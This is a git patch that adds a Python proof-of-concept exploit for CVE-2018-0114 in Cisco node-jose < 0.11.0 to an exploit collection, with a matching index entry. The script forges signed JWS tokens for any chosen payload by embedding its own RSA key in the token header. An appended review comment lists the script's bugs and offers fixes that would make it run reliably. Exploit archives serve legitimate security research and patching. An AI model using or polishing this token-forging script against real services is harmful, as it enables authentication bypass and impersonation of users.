From ce0c08bf9304f604d8e129d777d9f8356b617a98 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 22 Mar 2018 05:01:48 +0000
Subject: [PATCH] DB: 2018-03-22 1 changes to exploits/shellcodes Cisco node-jos < 0.11.0 - Re-sign Tokens
---
 exploits/multiple/webapps/44324.py | 88 ++++++++++++++++++++++++++++++
 files_exploits.csv | 1 +
 2 files changed, 89 insertions(+)
 create mode 100755 exploits/multiple/webapps/44324.py
diff --git a/exploits/multiple/webapps/44324.py b/exploits/multiple/webapps/44324.py
new file mode 100755
index 000000000..b6046bef2
--- /dev/null
+++ b/exploits/multiple/webapps/44324.py
@@ -0,0 +1,88 @@
+import base64
+import urllib
+import rsa
+import sys
+
+#zi0Black
+
+'''
+POC of CVE-2018-0114 Cisco node-jose <0.11.0
+
+Created by Andrea Cappa aka @zi0Black (GitHub,Twitter,Telegram)
+
+Mail: a.cappa@zioblack.xyz
+Site: https://zioblack.xyz
+
+A special thanks to Louis Nyffenegger, the founder of PentesterLab, for all the help he provided to allow me to write this script.
+
+Mail: louis@pentesterlab.com
+Site: https://pentesterlab.com
+
+'''
+
+def generate_key (key_size):
+ #create rsa priv & public key
+ print ("[+]Creating-RSA-pair-key")
+ (public_key,private_key)=rsa.newkeys(key_size,poolsize=8)
+ print ("\t[+]Pair-key-created")
+ return private_key, public_key
+
+def to_bytes(n, length, endianess='big'):
+ h = '%x' % n
+ s = ('0'*(len(h) % 2) + h).zfill(length*2).decode('hex')
+ return s if endianess == 'big' else s[::-1]
+
+def generate_header_payload(payload,pubkey):
+ #create header and payload
+ print ("[+]Assembling-the-header-and-the-payload")
+ xn = pubkey.n
+ xe = pubkey.e
+ n=base64.urlsafe_b64encode(to_bytes(xn,sys.getsizeof(xn),'big'))
+ e=base64.urlsafe_b64encode(to_bytes(xe,sys.getsizeof(xe),'big'))
+ headerAndPayload = base64.b64encode('{"alg":"RS256",'
+ '"jwk":{"kty":"RSA",'
+ '"kid":"topo.gigio@hackerzzzz.own",'
+ '"use":"sig",'
+ '"n":"'+n+'",'
+ '"e":"'+e+'"}}')
+ headerAndPayload=headerAndPayload+"."+base64.b64encode(payload)
+ headerAndPayload = headerAndPayload.encode('utf-8').replace("=","")
+ print ("\t[+]Assembed")
+ return headerAndPayload
+
+def generate_signature (firstpart,privkey):
+ #create signature
+ signature = rsa.sign(firstpart,privkey,'SHA-256')
+ signatureEnc = base64.b64encode(signature).encode('utf-8').replace("=", "")
+ print ("[+]Signature-created")
+ return signatureEnc
+
+def create_token(headerAndPayload,sign):
+ print ("[+]Forging-of-the-token\n\n")
+ token = headerAndPayload+"."+sign
+ token = urllib.quote_plus(token)
+ return token
+
+
+if(len(sys.argv)>0):
+ payload = str(sys.argv[1])
+ key_size = sys.argv[2]
+else:
+ payload = 'somthings'
+
+banner="""
+ _____ __ __ ______ ___ ___ __ ___ ___ __ __ _ _
+ / ____| \ \ / / | ____| |__ \ / _ \ /_ | / _ \ / _ \ /_ | /_ | | || |
+ | | \ \ / / | |__ ______ ) | | | | | | | | (_) | ______ | | | | | | | | | || |_
+ | | \ \/ / | __| |______| / / | | | | | | > _ < |______| | | | | | | | | |__ _|
+ | |____ \ / | |____ / /_ | |_| | | | | (_) | | |_| | | | | | | |
+ \_____| \/ |______| |____| \___/ |_| \___/ \___/ |_| |_| |_| by @zi0Black
+"""
+
+if __name__ == '__main__':
+ print (banner)
+ (privatekey,publickey) = generate_key(key_size)
+ firstPart = generate_header_payload(payload,publickey)
+ signature = generate_signature(firstPart,privatekey)
+ token = create_token(firstPart,signature)
+ print(token)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 03d05dd69..50b1367f6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -39029,3 +39029,4 @@ id,file,description,date,author,type,platform,port
 44295,exploits/hardware/webapps/44295.txt,"Contec Smart Home 4.15 - Unauthorized Password Reset",2018-03-16,Z3ro0ne,webapps,hardware,
 44317,exploits/hardware/webapps/44317.py,"Intelbras Telefone IP TIP200 LITE - Local File Disclosure",2018-03-20,anhax0r,webapps,hardware,
 44318,exploits/php/webapps/44318.txt,"Vehicle Sales Management System - Multiple Vulnerabilities",2018-03-20,Sing,webapps,php,
+44324,exploits/multiple/webapps/44324.py,"Cisco node-jos < 0.11.0 - Re-sign Tokens",2018-03-20,zioBlack,webapps,multiple,
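Review bot: The module-level guard `if(len(sys.argv)>0):` in 44324.py is always true because `sys.argv[0]` is the script name, so the `else` default is unreachable, a run with fewer than two arguments stops with an IndexError, and `key_size` is handed to `rsa.newkeys` as a string rather than an integer. I would write `if len(sys.argv) > 2:` with `key_size = int(sys.argv[2])`, and set a `key_size` default beside `payload = 'somthings'`, since `generate_key(key_size)` would otherwise reference an undefined name. The docstring names CVE-2018-0114 but not the weakness it demonstrates; a line such as `# node-jose < 0.11.0 verifies a JWS against the "jwk" carried in its own header; verifiers must use only keys configured out of band` would tell a reader what to patch and what to test for. The header should also say the script is Python 2 only, as `.decode('hex')` and `urllib.quote_plus` do not exist in Python 3.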